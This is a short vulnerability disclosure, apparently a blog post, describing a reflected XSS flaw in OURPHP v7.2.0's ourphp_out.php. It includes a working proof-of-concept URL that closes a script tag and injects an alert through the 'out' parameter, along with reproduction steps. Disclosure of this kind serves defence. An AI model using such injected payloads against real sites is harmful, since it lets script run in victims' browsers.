0%

OURPHP =v7.2.0 ourphp_out.php Reflection xss

OURPHP =v7.2.0 ourphp_out.php Reflection xss

Direct echo in the /client/manage/ourphp_out.php file, in addition to controllable variables, allows attackers to execute xss code.

Let’s look directly at the code as follows

image-20230327083656395

If the ourphp_admin parameter is logout, we will echo a controllable variable.
The controllable variable is out
And there’s a script tag in front, just close it for him.
So our payload is

1
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

Vulnerability recurrence

Let’s download the code through the following link and install it directly in PHP Study.

1
https://down.chinaz.com/api/index/download?id=51308&type=code

After installation, directly access the following path

1
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

image-20230327083926514